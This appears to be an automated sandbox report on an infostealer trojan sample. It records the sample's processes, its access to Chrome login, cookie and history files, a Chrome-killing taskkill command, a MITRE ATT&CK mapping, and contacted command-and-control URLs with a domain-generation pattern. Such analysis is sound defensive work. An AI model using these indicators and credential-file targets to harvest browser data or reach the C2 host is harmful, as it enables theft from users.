Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: 3_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B461F SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B1C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 30_2_002B631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_0043997A __EH_prolog3_GS,_memset,_memset,_memset,_memset,_memset,_memset,InitializeSecurityDescriptor,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,SetEntriesInAclW,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,SetSecurityDescriptorDacl,CoInitializeSecurity,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_004403BB __EH_prolog3_GS,GetCurrentThread,OpenThreadToken,GetLastError,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,
Source: fnhcdXEfus.exeBinary or memory string: Shell_TrayWnd
Source: fnhcdXEfus.exeBinary or memory string: AShell_TrayWnd0x0409
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_1001779F cpuid
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: GetLocaleInfoW,TranslateCharsetInfo,IsValidLocale,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00438713 __EH_prolog3_GS,GetSystemTimeAsFileTime,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00458F45 GetVersionExW,
Source: C:\Users\user\Desktop\fnhcdXEfus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Replication Through Removable Media1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1LSASS MemoryPeripheral Device Discovery11Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsCommand and Scripting Interpreter2Browser Extensions1Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Bootkit1Process Injection12Install Root Certificate2NTDSSystem Information Discovery59Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsQuery Registry2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery461VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncVirtualization/Sandbox Evasion13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion13Proc FilesystemProcess Discovery4Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowRemote System Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection12Network SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronBootkit1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 346325 Sample: fnhcdXEfus.exe Startdate: 30/01/2021 Architecture: WINDOWS Score: 90 93 Malicious sample detected (through community Yara rule) 2->93 95 Multi AV Scanner detection for submitted file 2->95 97 Uses ping.exe to sleep 2->97 99 3 other signatures 2->99 8 fnhcdXEfus.exe 1 3 2->8         started        13 msiexec.exe 2->13         started        process3 dnsIp4 71 c8dd8ae6dc4dc644.xyz 34.94.64.66, 49719, 49722, 49723 GOOGLEUS United States 8->71 67 C:\Users\user\...\63C4F3D9EA0CC861.exe, PE32 8->67 dropped 69 C:\...\63C4F3D9EA0CC861.exe:Zone.Identifier, ASCII 8->69 dropped 101 Detected unpacking (creates a PE file in dynamic memory) 8->101 103 Installs new ROOT certificates 8->103 105 Contains functionality to infect the boot sector 8->105 107 4 other signatures 8->107 15 63C4F3D9EA0CC861.exe 26 8->15         started        20 63C4F3D9EA0CC861.exe 1 15 8->20         started        22 cmd.exe 1 8->22         started        24 msiexec.exe 4 8->24         started        file5 signatures6 process7 dnsIp8 73 c8dd8ae6dc4dc644.xyz 15->73 75 C8DD8AE6DC4DC644.xyz 15->75 53 C:\Users\user\AppData\...\1612045890161.exe, PE32 15->53 dropped 55 C:\Users\user\AppData\Local\Temp\xldl.dll, PE32 15->55 dropped 57 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 15->57 dropped 65 7 other files (none is malicious) 15->65 dropped 81 Multi AV Scanner detection for dropped file 15->81 83 Machine Learning detection for dropped file 15->83 85 Contains functionality to infect the boot sector 15->85 87 Contains functionality to detect sleep reduction / modifications 15->87 26 cmd.exe 15->26         started        29 1612045890161.exe 2 15->29         started        31 ThunderFW.exe 1 15->31         started        77 c8dd8ae6dc4dc644.xyz 20->77 59 C:\Users\user\AppData\...\Secure Preferences, UTF-8 20->59 dropped 61 C:\Users\user\AppData\Local\...\Preferences, ASCII 20->61 dropped 89 Tries to harvest and steal browser information (history, passwords, etc) 20->89 33 cmd.exe 1 20->33         started        35 cmd.exe 1 20->35         started        79 127.0.0.1 unknown unknown 22->79 91 Uses ping.exe to sleep 22->91 37 conhost.exe 22->37         started        39 PING.EXE 1 22->39         started        63 C:\Users\user\AppData\Local\...\MSI6DDB.tmp, PE32 24->63 dropped file9 signatures10 process11 signatures12 41 conhost.exe 26->41         started        43 PING.EXE 26->43         started        109 Uses ping.exe to sleep 33->109 45 conhost.exe 33->45         started        47 PING.EXE 1 33->47         started        49 taskkill.exe 1 35->49         started        51 conhost.exe 35->51         started        process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
fnhcdXEfus.exe74%VirustotalBrowse
fnhcdXEfus.exe35%MetadefenderBrowse
fnhcdXEfus.exe83%ReversingLabsWin32.Trojan.Mingloa
fnhcdXEfus.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe35%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe83%ReversingLabsWin32.Trojan.Mingloa
C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe8%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe2%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\atl71.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_engine.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\download_engine.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll3%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\xldl.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\1612045890161.exe3%MetadefenderBrowse
C:\Users\user\AppData\Roaming\1612045890161.exe14%ReversingLabsWin32.Infostealer.EdgeCookiesView

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://C8DD8AE6DC4DC644.xyz/info_old/ddd1%VirustotalBrowse
http://C8DD8AE6DC4DC644.xyz/info_old/ddd0%Avira URL Cloudsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chromeH0%Avira URL Cloudsafe
https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
https://twitter.comsec-fetch-dest:0%Avira URL Cloudsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://ocsp.pki.goog/GTSGIAG300%Avira URL Cloudsafe
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css0%Avira URL Cloudsafe
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370%Avira URL Cloudsafe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b50%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://pki.goog/gsr2/GTSGIAG3.crt0)0%Avira URL Cloudsafe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:0%Avira URL Cloudsafe
http://C8DD8AE6DC4DC644.xyz/info_old/w0%Avira URL Cloudsafe
http://c8dd8ae6dc4dc644.xyz//fine/send0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTS1O1.crt0#0%Avira URL Cloudsafe
http://c8dd8ae6dc4dc644.xyz/info_old/r0%Avira URL Cloudsafe
https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
http://c8dd8ae6dc4dc644.xyz/info_old/e0%Avira URL Cloudsafe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.0%Avira URL Cloudsafe
http://c8dd8ae6dc4dc644.xyz/info_old/g0%Avira URL Cloudsafe
https://www.instagram.comsec-fetch-mode:0%Avira URL Cloudsafe
https://twitter.comReferer:0%Avira URL Cloudsafe
http://www.interestvideo.com/video1.php0%Avira URL Cloudsafe
http://C8DD8AE6DC4DC644.xyz:80/info_old/r0%Avira URL Cloudsafe
http://C8DD8AE6DC4DC644.xyz:80/info_old/w0%Avira URL Cloudsafe
http://crl.pki.goog/GTSGIAG3.crl00%Avira URL Cloudsafe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt0%Avira URL Cloudsafe
https://1A469593C1FE15DC.xyz/0%Avira URL Cloudsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
C8DD8AE6DC4DC644.xyz
34.94.64.66
truefalse
    		unknown
    c8dd8ae6dc4dc644.xyz
    		34.94.64.66
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://C8DD8AE6DC4DC644.xyz/info_old/dddfalse
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://c8dd8ae6dc4dc644.xyz//fine/sendfalse
      • Avira URL Cloud: safe
      		unknown
      http://c8dd8ae6dc4dc644.xyz/info_old/wfalse
        		unknown
        http://c8dd8ae6dc4dc644.xyz/info_old/rfalse
        • Avira URL Cloud: safe
        		unknown
        http://c8dd8ae6dc4dc644.xyz/info_old/efalse
        • Avira URL Cloud: safe
        		unknown
        http://c8dd8ae6dc4dc644.xyz/info_old/gfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplateecvB803.tmp.11.drfalse
          		high
          https://duckduckgo.com/chrome_newtab63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
            		high
            https://duckduckgo.com/ac/?q=63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
              		high
              http://www.interoperabilitybridges.com/wmp-extension-for-chromeH63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.messenger.com/63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                		high
                http://www.msn.comecvB803.tmp.11.drfalse
                  		high
                  http://www.nirsoft.net1612045890161.exe, 0000000B.00000002.267608441.0000000000198000.00000004.00000010.sdmpfalse
                    		high
                    https://deff.nelreports.net/api/report?cat=msnecvB803.tmp.11.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://twitter.com/ookie:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                      		high
                      https://twitter.comsec-fetch-dest:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fecvB803.tmp.11.drfalse
                        		high
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.pki.goog/gts1o1core0ecvB803.tmp.11.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://maps.windows.com/windows-app-web-linkecvB803.tmp.11.drfalse
                          		high
                          http://www.msn.com/?ocid=iehpecvB803.tmp.11.drfalse
                            		high
                            https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166ecvB803.tmp.11.drfalse
                              		high
                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3ecvB803.tmp.11.drfalse
                                		high
                                https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msnecvB803.tmp.11.drfalse
                                  		high
                                  http://crl.pki.goog/GTS1O1core.crl0ecvB803.tmp.11.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.messenger.com63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.nirsoft.net/1612045890161.exe, 1612045890161.exe.3.drfalse
                                      		high
                                      http://forms.real.com/real/realone/download.html?type=rpsp_us63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmpfalse
                                        		high
                                        http://ocsp.pki.goog/GTSGIAG30ecvB803.tmp.11.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%263C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                          		high
                                          https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.cssecvB803.tmp.11.drfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe63C4F3D9EA0CC861.exe, 00000003.00000003.364210797.000000000394C000.00000004.00000040.sdmpfalse
                                            		high
                                            https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937ecvB803.tmp.11.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5ecvB803.tmp.11.drfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                              		high
                                              https://www.instagram.com/63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/soap/encoding/download_engine.dll.3.drfalse
                                                  		high
                                                  http://www.xunlei.com/GETdownload_engine.dll.3.drfalse
                                                    		high
                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeeecvB803.tmp.11.drfalse
                                                      		high
                                                      https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://www.messenger.com/origin:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
                                                            		high
                                                            http://pki.goog/gsr2/GTS1O1.crt0ecvB803.tmp.11.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ecvB803.tmp.11.drfalse
                                                              		high
                                                              https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlecvB803.tmp.11.drfalse
                                                                		high
                                                                https://contextual.media.net/ecvB803.tmp.11.drfalse
                                                                  		high
                                                                  http://ocsp.pki.goog/gsr202ecvB803.tmp.11.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://pki.goog/repository/0ecvB803.tmp.11.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://api.twitter.com/1.1/statuses/update.json63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9ecvB803.tmp.11.drfalse
                                                                      		high
                                                                      http://www.msn.com/ecvB803.tmp.11.drfalse
                                                                        		high
                                                                        https://upload.twitter.com/i/media/upload.json63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734ecvB803.tmp.11.drfalse
                                                                            		high
                                                                            https://twitter.com/compose/tweetsec-fetch-mode:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674ecvB803.tmp.11.drfalse
                                                                                		high
                                                                                https://www.messenger.com/accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804ecvB803.tmp.11.drfalse
                                                                                    		high
                                                                                    https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3ecvB803.tmp.11.drfalse
                                                                                      		high
                                                                                      https://contextual.media.net/48/nrrV18753.jsecvB803.tmp.11.drfalse
                                                                                        		high
                                                                                        http://crl.pki.goog/gsr2/gsr2.crl0?ecvB803.tmp.11.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://pki.goog/gsr2/GTSGIAG3.crt0)ecvB803.tmp.11.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=063C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://feedback.googleusercontent.com63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
